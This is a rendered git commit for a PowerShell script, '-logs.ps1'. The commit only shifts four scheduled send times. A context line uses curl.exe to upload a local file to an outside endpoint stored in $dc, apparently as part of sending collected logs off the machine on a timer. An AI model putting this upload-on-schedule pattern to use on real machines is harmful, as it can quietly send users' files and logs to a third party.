Update -logs.ps1
This commit is contained in:
parent
e22e18cc91
commit
74cdae15d9
1 changed files with 4 additions and 4 deletions
|
@ -30,10 +30,10 @@ if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc}
|
||||||
|
|
||||||
# times logs will be sent [keep in military time]
|
# times logs will be sent [keep in military time]
|
||||||
$logTimes = @(
|
$logTimes = @(
|
||||||
'00:30:00',
|
'00:36:00',
|
||||||
'00:30:15',
|
'00:36:15',
|
||||||
'00:30:30',
|
'00:36:30',
|
||||||
'00:30:45',
|
'00:36:45',
|
||||||
'04:00:00',
|
'04:00:00',
|
||||||
'05:00:00',
|
'05:00:00',
|
||||||
'06:00:00',
|
'06:00:00',
|
||||||
|
|
Loading…
Reference in a new issue